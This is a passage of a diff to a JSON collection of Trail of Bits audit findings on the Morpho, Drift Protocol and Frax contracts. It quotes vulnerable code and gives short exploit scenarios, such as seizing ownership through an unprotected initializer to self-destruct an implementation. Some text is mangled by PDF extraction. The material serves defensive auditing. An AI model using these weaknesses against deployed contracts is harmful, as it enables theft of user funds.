misconguring the system. Specically, add zero-value checks to the setPositionsManager, setRewardsManager, setInterestRates, setTreasuryVault, and setIncentivesVault functions, as well as the _cETH and _cWeth parameters of the initialize function in the MorphoGovernance contract. Long term, incorporate Slither into a continuous integration pipeline, which will continuously warn developers when functions do not have checks for zero values.", + "title": "6. The zero-copy feature in Anchor is experimental ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Several structs for keeping state use Anchors zero-copy functionality. The Anchor documentation states that this is still an experimental feature that should be used only when Borsh serialization cannot be used without hitting the stack or heap limits. Exploit Scenario The Anchor framework has a bug in the zero-copy feature, or updates it with a breaking change, in a way that aects the security model of the Drift smart contract. An attacker discovers this problem and leverages it to steal funds from the contract. #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct User { pub authority: Pubkey , pub delegate: Pubkey , pub name: [ u8 ; 32 ], pub spot_positions: [SpotPosition; 8 ], pub perp_positions: [PerpPosition; 8 ], pub orders: [Order; 32 ], pub last_add_perp_lp_shares_ts: i64 , pub total_deposits: u64 , pub total_withdraws: u64 , pub total_social_loss: u64 , // Fees (taker fees, maker rebate, referrer reward, filler reward) and pnl for perps pub settled_perp_pnl: i64 , // Fees (taker fees, maker rebate, filler reward) for spot pub cumulative_spot_fees: i64 , pub cumulative_perp_funding: i64 , pub liquidation_margin_freed: u64 , // currently unimplemented // currently unimplemented pub liquidation_start_ts: i64 , pub next_order_id: u32 , pub max_margin_ratio: u32 , pub next_liquidation_id: u16 , pub sub_account_id: u16 , pub status: UserStatus , pub is_margin_trading_enabled: bool , pub padding: [ u8 ; 26 ], } Figure 6.1: Example of a struct using zero copy Recommendations Short term, evaluate if it is possible to move away from using zero copy without hitting the stack or heap limits, and do so if possible. Not relying on experimental features reduces the risk of exposure to bugs in the Anchor framework. Long term, adopt a conservative stance by using stable versions of packages and features. This reduces both risk and time spent on maintaining compatibility with code still in ux.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2322,29 +5080,29 @@ ] }, { - "title": "5. Risky use of toggle functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The codebase uses a toggle function, togglePauseStatus, to pause and unpause a market. This function is error-prone because setting a pause status on a market depends on the markets current state. Multiple uncoordinated pauses could result in a failure to pause a market in the event of an incident. /// @notice Toggles the pause status on a specific market in case of emergency. /// @param _poolTokenAddress The address of the market to pause/unpause. function togglePauseStatus(address _poolTokenAddress) external onlyOwner isMarketCreated(_poolTokenAddress) { } Types.MarketStatus storage marketStatus_ = marketStatus[_poolTokenAddress]; bool newPauseStatus = !marketStatus_.isPaused; marketStatus_.isPaused = newPauseStatus; emit PauseStatusChanged(_poolTokenAddress, newPauseStatus); Figure 5.1: The togglePauseStatus method in MorphoGovernance This issue also applies to togglePartialPauseStatus, toggleP2P, and toggleCompRewardsActivation in MorphoGovernance and to togglePauseStatus in IncentivesVault. Exploit Scenario All signers of a 4-of-9 multisignature wallet that owns a Morpho contract notice an ongoing attack that is draining user funds from the protocol. Two groups of four signers hurry to independently call togglePauseStatus, resulting in a failure to pause the system and leading to the further loss of funds. Recommendations Short term, replace the toggle functions with ones that explicitly set the pause status to true or false. Long term, carefully review the incident response plan and ensure that it leaves as little room for mistakes as possible.", + "title": "7. Hard-coded indices into account data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The implementations for both PerpMarketMap and SpotMarketMap use hard-coded indices into the accounts data in order to retrieve the marked_index property without having to deserialize all the data. // market index 1160 bytes from front of account let market_index = u16 ::from_le_bytes(*array_ref![data, 1160 , 2 ]); Figure 7.1: programs/drift/src/state/perp_market_map.rs#L110L111 let market_index = u16 ::from_le_bytes(*array_ref![data, 684 , 2 ]); Figure 7.2: programs/drift/src/state/spot_market_map.rs#L174 Exploit Scenario Alice, a Drift Protocol developer, changes the layout of the structure or the width of the market_index property but fails to update one or more of the hard-coded indices. Mallory notices this bug and nds a way to use it to steal funds. Recommendations Short term, add consts that include the value of the indices and the type size. Also add comments explaining the calculation of the values. This ensures that by updating the constants, all code relying on the operation will retrieve the correct part of the unlying data. Long term, add an implementation to the struct to unpack the market_index from the serialized state. This reduces the maintenance burden of updating the code that accesses data in this way.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "6. Anyone can destroy Morphos implementation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "An incorrect access control on the initialize function for Morphos implementation contract allows anyone to destroy the contract. Morpho uses the delegatecall proxy pattern for upgradeability: abstract contract MorphoStorage is OwnableUpgradeable, ReentrancyGuardUpgradeable { Figure 6.1: contracts/compound/MorphoStorage.sol#L16 With this pattern, a proxy contract is deployed and executes a delegatecall to the implementation contract for certain operations. Users are expected to interact with the system through this proxy. However, anyone can also directly call Morphos implementation contract. Despite the use of the proxy pattern, the implementation contract itself also has delegatecall capacities. For example, when called in the updateP2PIndexes function, setReserveFactor executes a delegatecall on user-provided addresses: function setReserveFactor(address _poolTokenAddress, uint16 _newReserveFactor) external onlyOwner isMarketCreated(_poolTokenAddress) { if (_newReserveFactor > MAX_BASIS_POINTS) revert ExceedsMaxBasisPoints(); updateP2PIndexes(_poolTokenAddress); Figure 6.2: contracts/compound/MorphoGovernance.sol#L203-L209 function updateP2PIndexes(address _poolTokenAddress) public { address(interestRatesManager).functionDelegateCall( abi.encodeWithSelector( interestRatesManager.updateP2PIndexes.selector, _poolTokenAddress ) ); } Figure 6.3: contracts/compound/MorphoUtils.sol#L119-L126 These functions are protected by the onlyOwner modier; however, the systems owner is set by the initialize function, which is callable by anyone: function initialize( IPositionsManager _positionsManager, IInterestRatesManager _interestRatesManager, IComptroller _comptroller, Types.MaxGasForMatching memory _defaultMaxGasForMatching, uint256 _dustThreshold, uint256 _maxSortedUsers, address _cEth, address _wEth ) external initializer { __ReentrancyGuard_init(); __Ownable_init(); Figure 6.4: contracts/compound/MorphoGovernance.sol#L114-L125 As a result, anyone can call Morpho.initialize to become the owner of the implementation and execute any delegatecall from the implementation, including to a contract containing a selfdestruct. Doing so will cause the proxy to point to a contract that has been destroyed. This issue is also present in PositionsManagerForAave. Exploit Scenario The system is deployed. Eve calls Morpho.initialize on the implementation and then calls setReserveFactor, triggering a delegatecall to an attacker-controlled contract that self-destructs. As a result, the system stops working. Recommendations Short term, add a constructor in MorphoStorage and PositionsManagerForAaveStorage that will set an is_implementation variable to true and check that this variable is false before executing any critical operation (such as initialize, delegatecall, and selfdestruct). By setting this variable in the constructor, it will be set only in the implementation and not in the proxy. Long term, carefully review the pitfalls of using the delegatecall proxy pattern. References Breaking Aave Upgradeability", + "title": "8. Missing verication of maker and maker_stats accounts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The handle_place_and_take_perp_order and handle_place_and_take_spot_order functions retrieve two additional accounts that are passed to the instruction: maker and maker_stats . However, there is no check that the two accounts are linked (i.e., that their authority is the same). Due to time constraints, we were unable to determine the impact of this nding. pub fn get_maker_and_maker_stats <'a>( account_info_iter: & mut Peekable>>, ) -> DriftResult <(AccountLoader<'a, User>, AccountLoader<'a, UserStats>)> { let maker_account_info = next_account_info(account_info_iter).or( Err (ErrorCode::MakerNotFound))?; validate!( maker_account_info.is_writable, ErrorCode::MakerMustBeWritable )?; let maker: AccountLoader = AccountLoader::try_from(maker_account_info).or( Err (ErrorCode::CouldNotDeserializeMak er))?; let maker_stats_account_info = next_account_info(account_info_iter).or( Err (ErrorCode::MakerStatsNotFound))?; validate!( maker_stats_account_info.is_writable, ErrorCode::MakerStatsMustBeWritable )?; let maker_stats: AccountLoader = AccountLoader::try_from(maker_stats_account_info) .or( Err (ErrorCode::CouldNotDeserializeMakerStats))?; Ok ((maker, maker_stats)) } Figure 8.1: programs/drift/src/instructions/optional_accounts.rs#L47L74 Exploit Scenario Mallory passes two unlinked accounts of the correct type in the places for maker and maker_stats , respectively. This causes the contract to operate outside of its intended use. Recommendations Short term, add a check that the authority of the accounts are the same. Long term, add all code for authentication of accounts to the front of instruction handlers. This increases the clarity of the checks and helps with auditing the authentication.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { - "title": "7. Lack of return value checks during token transfers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "In certain parts of the codebase, contracts that execute transfers of the Morpho token do not check the values returned from those transfers. The development of the Morpho token was not yet complete at the time of the audit, so we were unable to review the code specic to the Morpho token. Some tokens that are not ERC20 compliant return false instead of reverting, so failure to check such return values could result in undened behavior, including the loss of funds. If the Morpho token adheres to ERC20 standards, then this issue may not pose a risk; however, due to the lack of return value checks, the possibility of undened behavior cannot be eliminated. function transferMorphoTokensToDao(uint256 _amount) external onlyOwner { morphoToken.transfer(morphoDao, _amount); emit MorphoTokensTransferred(_amount); } Figure 7.1: The transerMorphoTokensToDao method in IncentivesVault Exploit Scenario The Morpho token code is completed and deployed alongside the other Morpho system components. It is implemented in such a way that it returns false instead of reverting when transfers fail, leading to undened behavior. Recommendations Short term, consider using a safeTransfer library for all token transfers. Long term, review the token integration checklist and check all the components of the system to ensure that they interact with tokens safely.", + "title": "9. Panics used for error handling ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In several places, the code panics when an arithmetic overow or underow occurs. Panics should be reserved for programmer errors (e.g., assertion violations). Panicking on user errors dilutes the utility of the panic operation. An example appears in gure 9.1. The adjust_amm function uses both the question mark operator ( ? ) and unwrap to handle errors resulting from peg related calculations. An overow or underow could result from an invalid input to the function. An error should be returned in such cases. budget_delta_peg = budget_i128 .safe_add(adjustment_cost.abs())? .safe_mul(PEG_PRECISION_I128)? .safe_div(per_peg_cost)?; budget_delta_peg_magnitude = budget_delta_peg.unsigned_abs(); new_peg = if budget_delta_peg > 0 { ... } else if market.amm.peg_multiplier > budget_delta_peg_magnitude { market .amm .peg_multiplier .safe_sub(budget_delta_peg_magnitude) .unwrap() } else { 1 }; Figure 9.1: programs/drift/src/math/repeg.rs#L349L369 Running Clippy with the following command identies 66 locations in the drift package where expect or unwrap is used: cargo clippy -p drift -- -A clippy::all -W clippy::expect_used -W clippy::unwrap_used Many of those uses appear to be related to invalid input. Exploit Scenario Alice, a Drift Protocol developer, observes a panic in the Drift Protocol codebase. Alice ignores the panic, believing that it is caused by user error, but it is actually caused by a bug she introduced. Recommendations Short term, reserve the use of panics for programmer errors. Have relevant areas of the code return Result::Err on user errors. Adopting such a policy will help to distinguish the two types of errors when they occur. Long term, consider denying the following Clippy lints: clippy::expect_used clippy::unwrap_used clippy::panic Although this will not prevent all panics, it will prevent many of them.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2352,29 +5110,29 @@ ] }, { - "title": "8. Risk of loss of precision in division operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "A common pattern in the codebase is to divide a users debt by the total supply of a token; a loss of precision in these division operations could occur, which means that the supply delta would not account for the entire matched delta amount. The impact of this potential loss of precision requires further investigation. For example, the borrowLogic method uses this pattern: toWithdraw += matchedDelta; remainingToBorrow -= matchedDelta; delta.p2pSupplyDelta -= matchedDelta.div(poolSupplyIndex); emit P2PSupplyDeltaUpdated(_poolTokenAddress, delta.p2pSupplyDelta); Figure 8.1: Part of the borrowLogic() method Here, if matchedDelta is not a multiple of poolSupplyIndex, the remainder would not be taken into account. In an extreme case, if matchedDelta is smaller than poolSupplyIndex, the result of the division operation would be zero. An attacker could exploit this loss of precision to extract small amounts of underlying tokens sitting in the Morpho contract. Exploit Scenario Bob transfers some Dai to the Morpho contract by mistake. Eve sees this transfer, deposits some collateral, and then borrows an amount of Dai from Morpho small enough that it does not aect Eve's debt. Eve withdraws her deposited collateral and walks out with Bobs Dai. Further investigation into this exploit scenario is required. Recommendations Short term, add checks to validate input data to prevent precision issues in division operations. Long term, review all the arithmetic that is vulnerable to rounding issues.", + "title": "10. Testing code used in production ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In some locations in the Drift Protocol codebase, testing code is mixed with production code with no way to discern between them. Testing code should be clearly indicated as such and guarded by #[cfg(test)] to avoid being called in production. Examples appear in gures 10.1 and 10.2. The OracleMap struct has a quote_asset_price_data eld that is used only when get_price_data is passed a default Pubkey . Similarly, the AMM implementation contains functions that are used only for testing and are not guarded by #[cfg(test)] . pub struct OracleMap <'a> { oracles: BTreeMap >, price_data: BTreeMap , pub slot: u64 , pub oracle_guard_rails: OracleGuardRails , pub quote_asset_price_data: OraclePriceData , } impl <'a> OracleMap<'a> { ... pub fn get_price_data (& mut self , pubkey: & Pubkey ) -> DriftResult <&OraclePriceData> { if pubkey == &Pubkey::default() { return Ok (& self .quote_asset_price_data); } Figure 10.1: programs/drift/src/state/oracle_map.rs#L22L47 impl AMM { pub fn default_test () -> Self { let default_reserves = 100 * AMM_RESERVE_PRECISION; // make sure tests dont have the default sqrt_k = 0 AMM { Figure 10.2: programs/drift/src/state/perp_market.rs#L490L494 Drift Protocol has indicated that the quote_asset_price_data eld (gure 10.1) is used in production. This raises concerns because there is currently no way to set the contents of this eld, and no assets price is perfectly constant (e.g., even stablecoins prices uctuate). For this reason, we have changed this ndings severity from Informational to Undetermined. Exploit Scenario Alice, a Drift Protocol developer, introduces code that calls the default_test function, not realizing it is intended only for testing. Alice introduces a bug as a result. Recommendations Short term, to the extent possible, avoid mixing testing and production code by, for example, using separate data types and storing the code in separate les. When testing and production code must be mixed, clearly mark the testing code as such, and guard it with #[cfg(test)] . These steps will help to ensure that testing code is not deployed in production. Long term, as new code is added to the codebase, ensure that the aforementioned standards are maintained. Testing code is not typically held to the same standards as production code, so it is more likely to include bugs.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "1. Testing is not routine ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Frax Solidity repository does not have reproducible tests that can be run locally. Having reproducible tests is one of the best ways to ensure a codebases functional correctness. This nding is based on the following events: We tried to carry out the instructions in the Frax Solidity README at commit 31dd816 . We were unsuccessful. We reached out to Frax Finance for assistance. Frax Finance in turn pushed eight additional commits to the Frax Solidity repository (not counting merge commits). With these changes, we were able to run some of the tests, but not all of them. These events suggest that tests require substantial eort to run (as evidenced by the eight additional commits), and that they were not functional at the start of the assessment. Exploit Scenario Eve exploits a aw in a Frax Solidity contract. The aw would likely have been revealed through unit tests. Recommendations Short term, develop reproducible tests that can be run locally for all contracts. A comprehensive set of unit tests will help expose errors, protect against regressions, and provide a sort of documentation to users. Long term, incorporate unit testing into the CI process: Run the tests specic to contract X when a push or pull request aects contract X. Run all tests before deploying any new code, including updates to existing contracts. Automating the testing process will help ensure the tests are run regularly and consistently.", + "title": "11. Inconsistent use of checked arithmetic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In several locations, the Drift Protocol codebase uses unchecked arithmetic. For example, in calculate_margin_requirement_and_total_collateral_and_liability_info (gure 11.1), the variable num_perp_liabilities is used as an operand in both a checked and an unchecked operation. To protect against overows and underows, unchecked arithmetic should be used sparingly. num_perp_liabilities += 1 ; } with_isolated_liability &= margin_requirement > 0 && market.contract_tier == ContractTier::Isolated; } if num_spot_liabilities > 0 { validate!( margin_requirement > 0 , ErrorCode::InvalidMarginRatio, \"num_spot_liabilities={} but margin_requirement=0\" , num_spot_liabilities )?; } let num_of_liabilities = num_perp_liabilities.safe_add(num_spot_liabilities) ?; Figure 11.1: programs/drift/src/math/margin.rs#L499L515 Note that adding the following to the crate root will cause Clippy to fail the build whenever unchecked arithmetic is used: #![deny(clippy::integer_arithmetic)] Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces an arithmetic overow bug into the codebase. The bug would have been revealed by the use of checked arithmetic. However, because unchecked arithmetic is used, the bug goes unnoticed. Recommendations Short term, add the #![deny(clippy::integer_arithmetic)] attribute to the drift crate root. Add #[allow(clippy::integer_arithmetic)] in rare situations where code is performance critical and its safety can be guaranteed through other means. Taking these steps will reduce the likelihood of overow or underow bugs residing in the codebase. Long term, if additional Solana programs are added to the codebase, ensure the #![deny(clippy::integer_arithmetic)] attribute is also added to them. This will reduce the likelihood that newly introduced crates contain overow or underow bugs.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "2. No clear mapping from contracts to tests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "There are 405 Solidity les within the contracts folder 1 , but there are only 80 les within the test folder 2 . Thus, it is not clear which tests correspond to which contracts. The number of contracts makes it impractical for a developer to run all tests when working on any one contract. Thus, to test a contract eectively, a developer will need to know which tests are specic to that contract. Furthermore, as per TOB-FRSOL-001 , we recommend that the tests specic to contract X be run when a push or pull request aects contract X. To apply this recommendation, a mapping from the contracts to their relevant tests is needed. Exploit Scenario Alice, a Frax Finance developer, makes a change to a Frax Solidity contract. Alice is unable to determine the le that should be used to test the contract and deploys the contract untested. The contract is exploited using a bug that would have been revealed by a test. Recommendations Short term, for each contract, produce a list of tests that exercise that contract. If any such list is empty, produce tests for that contract. Having such lists will help facilitate contract testing following a change to it. Long term, as per TOB-FRSOL-001 , incorporate unit testing into the CI process by running the tests specic to contract X when a push or pull request aects contract X. Automating the testing process will help ensure the tests are run regularly and consistently. 1 find contracts -name '*.sol' | wc -l 2 find test -type f | wc -l", + "title": "12. Inconsistent and incomplete exchange status checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Drift Protocols representation of the exchanges status has several problems: The exchanges status is represented using an enum , which does not allow more than one individual operation to be paused (gures 12.1 and 12.2). As a result, an administrator could inadvertently unpause one operation by trying to pause another (gure 12.3). The ExchangeStatus variants do not map cleanly to exchange operations. For example, handle_transfer_deposit checks whether the exchange status is WithdrawPaused (gure 12.4). The functions name suggests that the function checks whether transfers or deposits are paused. The ExchangeStatus is checked in multiple inconsistent ways. For example, in handle_update_funding_rate (gure 12.5), both an access_control attribute and the body of the function include a check for whether the exchange status is FundingPaused . pub enum ExchangeStatus { Active, FundingPaused, AmmPaused, FillPaused, LiqPaused, WithdrawPaused, Paused, } Figure 12.1: programs/drift/src/state/state.rs#L36L44 #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey , pub whitelist_mint: Pubkey , ... pub exchange_status: ExchangeStatus , pub padding: [ u8 ; 17 ], } Figure 12.2: programs/drift/src/state/state.rs#L8L33 pub fn handle_update_exchange_status ( ctx: Context , exchange_status: ExchangeStatus , ) -> Result <()> { ctx.accounts.state.exchange_status = exchange_status; Ok (()) } Figure 12.3: programs/drift/src/instructions/admin.rs#L1917L1923 #[access_control( withdraw_not_paused (&ctx.accounts.state) )] pub fn handle_transfer_deposit ( ctx: Context , market_index: u16 , amount: u64 , ) -> anchor_lang :: Result <()> { Figure 12.4: programs/drift/src/instructions/user.rs#L466L473 #[access_control( market_valid(&ctx.accounts.perp_market) funding_not_paused (&ctx.accounts.state) valid_oracle_for_perp_market(&ctx.accounts.oracle, &ctx.accounts.perp_market) )] pub fn handle_update_funding_rate ( ctx: Context , perp_market_index: u16 , ) -> Result <()> { ... let is_updated = controller::funding::update_funding_rate( perp_market_index, perp_market, & mut oracle_map, now, &state.oracle_guard_rails, matches! (state.exchange_status, ExchangeStatus::FundingPaused ), None , )?; ... } Figure 12.5: programs/drift/src/instructions/keeper.rs#L1027L1078 The Medium post describing the incident that occurred around May 11, 2022 suggests that the exchanges pausing mechanisms contributed to the incidents subsequent fallout: The protocol did not have a kill-switch where only withdrawals were halted. The protocol was paused in the second pause to prevent a further drain of user funds This suggests that the pausing mechanisms should receive heightened attention to reduce the damage should another incident occur. Exploit Scenario Mallory tricks an administrator into pausing funding after withdrawals have already been paused. By pausing funding, the administrator unwittingly unpauses withdrawals. Recommendations Short term: Represent the exchanges status as a set of ags. This will allow individual operations to be paused independently of one another. Ensure exchange statuses map cleanly to the operations that can be paused. Add documentation where there is potential for confusion. This will help ensure developers check the proper exchange statuses. Adopt a single approach for checking the exchanges status and apply it consistently throughout the codebase. If an exception must be made for a check, explain why in a comment near that check. Adopting such a policy will reduce the likelihood that a missing check goes unnoticed. Long term, periodically review the exchange status checks. Since the exchange status checks represent a form of access control, they deserve heightened scrutiny. Moreover, the exchanges pausing mechanisms played a role in past incidents.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2382,49 +5140,49 @@ ] }, { - "title": "3. amoMinterBorrow cannot be paused ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The amoMinterBorrow function does not check for any of the paused ags or whether the minters associated collateral type is enabled. This reduces the FraxPoolV3 custodians ability to limit the scope of an attack. The relevant code appears in gure 3.1. The custodian can set recollateralizePaused[minter_col_idx] to true if there is a problem with recollateralization, and collateralEnabled[minter_col_idx] to false if there is a problem with the specic collateral type. However, amoMinterBorrow checks for neither of these. // Bypasses the gassy mint->redeem cycle for AMOs to borrow collateral function amoMinterBorrow ( uint256 collateral_amount ) external onlyAMOMinters { // Checks the col_idx of the minter as an additional safety check uint256 minter_col_idx = IFraxAMOMinter ( msg.sender ). col_idx (); // Transfer TransferHelper. safeTransfer (collateral_addresses[minter_col_idx], msg.sender , collateral_amount); } Figure 3.1: contracts/Frax/Pools/FraxPoolV3.sol#L552-L559 Exploit Scenario Eve discovers and exploits a bug in an AMO contract. The FraxPoolV3 custodian discovers the attack but is unable to stop it. The FraxPoolV3 owner is required to disable the AMO contracts. This occurs after signicant funds have been lost. Recommendations Short term, require recollateralizePaused[minter_col_idx] to be false and collateralEnabled[minter_col_idx] to be true for a call to amoMinterBorrow to succeed. This will help the FraxPoolV3 custodian to limit the scope of an attack. Long term, regularly review all uses of contract modiers, such as collateralEnabled . Doing so will help to expose bugs like the one described here.", + "title": "13. Spot market access controls are incomplete ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Functions in admin.rs involving perpetual markets verify that the market is valid, i.e., not delisted (gure 13.1). However, functions involving spot markets do not include such checks (e.g., gure 13.2). Drift Protocol has indicated that the spot market implementation is incomplete. #[access_control( market_valid(&ctx.accounts.perp_market) )] pub fn handle_update_perp_market_expiry ( ctx: Context , expiry_ts: i64 , ) -> Result <()> { Figure 13.1: programs/drift/src/instructions/admin.rs#L676L682 _ pub fn handle_update_spot_market_expiry ( ctx: Context , expiry_ts: i64 , ) -> Result <()> { Figure 13.2: programs/drift/src/instructions/admin.rs#L656L660 A similar example concerning whether the exchange is paused appears in gure 13.3 and 13.4. #[access_control( exchange_not_paused(&ctx.accounts.state) )] pub fn handle_place_perp_order (ctx: Context , params: OrderParams ) -> Result <()> { Figure 13.3: programs/drift/src/instructions/user.rs#L687L690 _ pub fn handle_place_spot_order (ctx: Context , params: OrderParams ) -> Result <()> { Figure 13.4: programs/drift/src/instructions/user.rs#L1022L1023 Exploit Scenario Mallory tricks an administrator into making a call that re-enables an expiring spot market. Mallory prots by trading against the should-be-expired spot market. Recommendations Short term, add the missing access controls to the spot market functions in admin.rs . This will ensure that an administrator cannot accidentally perform an operation on an expired spot market. Long term, add tests to verify that each function involving spot markets fails when invoked on an expired spot market. This will increase condence that the access controls have been implemented correctly.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "4. Array updates are not constant time ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "In several places, arrays are allowed to grow without bound, and those arrays are searched linearly. If an array grows too large and the block gas limit is too low, such a search would fail. An example appears in gure 4.1. Minters are pushed to but never popped from minters_array . When a minter is removed from the array, its entry is searched for and then set to 0 . Note that the cost of such a search is proportional to the searched-for entrys index within the array. Thus, there will eventually be entries that cannot be removed under the current block gas limits because their positions within the array are too large. function removeMinter ( address minter_address ) external onlyByOwnGov { require (minter_address != address ( 0 ), \"Zero address detected\" ); require (minters[minter_address] == true , \"Address nonexistant\" ); // Delete from the mapping delete minters[minter_address]; // 'Delete' from the array by setting the address to 0x0 for ( uint i = 0 ; i < minters_array.length; i++){ if (minters_array[i] == minter_address) { minters_array[i] = address ( 0 ); // This will leave a null in the array and keep the indices the same break ; } } emit MinterRemoved (minter_address); } Figure 4.1: contracts/ERC20/__CROSSCHAIN/CrossChainCanonical.sol#L269-L285 Note that occasionally popping values from minters_array is not sucient to address the issue. An array can be popped from occasionally, yet its size can still be unbounded. A similar problem exists in CrossChainCanonical.sol with respect to bridge_tokens_array . This problem appears to exist in many parts of the codebase. Exploit Scenario Eve tricks Frax Finance into adding her minter to the CrosschainCanonical contract. Frax Finance later decides to remove her minter, but is unable to do so because minters_array has grown too large and block gas limits are too low. Recommendations Short term, enforce the following policy throughout the codebase: an arrays size is bounded, or the array is linearly searched, but never both. Arrays that grow without bound can be updated by moving computations, such as the computation of the index that needs to be updated, o-chain. Alternatively, the code that uses the array could be adjusted to eliminate the need for the array or to instead use a linked list. Adopting these changes will help ensure that the success of critical operations is not dependent on block gas limits. Long term, incorporate a check for this problematic code pattern into the CI pipeline. In the medium term, such a check might simply involve regular expressions. In the longer term, use Semgrep for Solidity if or when such support becomes stable. This will help to ensure the problem is not reintroduced into the codebase.", + "title": "14. Oracles can be invalid in at most one way ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase represents oracle validity using an enum , which does not allow an oracle to be invalid in more than one way. Furthermore, the code that determines an oracles validity imposes an implicit hierarchy on the ways an oracle could be invalid. This design is fragile and likely to cause future problems. The OracleValidity enum is shown in gure 14.1, and the code that determines an oracles validity is shown in gure 14.2. Note that if an oracle is, for example, both too volatile and too uncertain, the oracle will be labeled simply TooVolatile . A caller that does not account for this fact and simply checks whether an oracle is TooUncertain could overlook oracles that are both too volatile and too uncertain. pub enum OracleValidity { Invalid, TooVolatile, TooUncertain, StaleForMargin, InsufficientDataPoints, StaleForAMM, Valid, } Figure 14.1: programs/drift/src/math/oracle.rs#L21L29 pub fn oracle_validity ( last_oracle_twap: i64 , oracle_price_data: & OraclePriceData , valid_oracle_guard_rails: & ValidityGuardRails , ) -> DriftResult { ... let oracle_validity = if is_oracle_price_nonpositive { OracleValidity::Invalid } else if is_oracle_price_too_volatile { OracleValidity::TooVolatile } else if is_conf_too_large { OracleValidity::TooUncertain } else if is_stale_for_margin { OracleValidity::StaleForMargin } else if !has_sufficient_number_of_data_points { OracleValidity::InsufficientDataPoints } else if is_stale_for_amm { OracleValidity::StaleForAMM } else { OracleValidity::Valid }; Ok (oracle_validity) } Figure 14.2: programs/drift/src/math/oracle.rs#L163L230 Exploit Scenario Alice, a Drift Protocol developer, is unaware of the implicit hierarchy among the OracleValidity variants. Alice writes code like oracle_validity != OracleValidity::TooUncertain and unknowingly introduces a bug into the codebase. Recommendations Short term, represent oracle validity as a set of ags. This will allow oracles to be invalid in more than one way, which will result in more robust and maintainable code. Long term, thoroughly test all code that relies on oracle validity. This will help ensure the codes correctness following the aforementioned change.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "5. Incorrect calculation of collateral amount in redeemFrax ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The redeemFrax function of the FraxPoolV3 contract multiplies a FRAX amount with the collateral price to calculate the equivalent collateral amount (see the highlights in gure 5.1). This is incorrect. The FRAX amount should be divided by the collateral price instead. Fortunately, in the current deployment of FraxPoolV3 , only stablecoins are used as collateral, and their price is set to 1 (also see issue TOB-FRSOL-009 ). This mitigates the issue, as multiplication and division by one are equivalent. If the collateral price were changed to a value dierent from 1 , the exploit scenario described below would become possible, enabling users to steal all collateral from the protocol. if (global_collateral_ratio >= PRICE_PRECISION) { // 1-to-1 or overcollateralized collat_out = frax_after_fee .mul(collateral_prices[col_idx]) .div( 10 ** ( 6 + missing_decimals[col_idx])); // PRICE_PRECISION + missing decimals fxs_out = 0 ; } else if (global_collateral_ratio == 0 ) { // Algorithmic fxs_out = frax_after_fee .mul(PRICE_PRECISION) .div(getFXSPrice()); collat_out = 0 ; } else { // Fractional collat_out = frax_after_fee .mul(global_collateral_ratio) .mul(collateral_prices[col_idx]) .div( 10 ** ( 12 + missing_decimals[col_idx])); // PRICE_PRECISION ^2 + missing decimals fxs_out = frax_after_fee .mul(PRICE_PRECISION.sub(global_collateral_ratio)) .div(getFXSPrice()); // PRICE_PRECISIONS CANCEL OUT } Figure 5.1: Part of the redeemFrax function ( FraxPoolV3.sol#412433 ) When considering the of an entity , it is common to think of it as the amount of another entity or s per . that has a value equivalent to 1 . The unit of measurement of is , For example, the price of one apple is the number of units of another entity that can be exchanged for one unit of apple. That other entity is usually the local currency. For the US, the price of an apple is the number of US dollars that can be exchanged for an apple: = $ . 1. Given a and an amount of , one can compute the equivalent through multiplication: = . 2. Given a and an amount of , one can compute the equivalent through division: = / . In short, multiply if the known amount and price refer to the same entity; otherwise, divide. The getFraxInCollateral function correctly follows rule 2 by dividing a 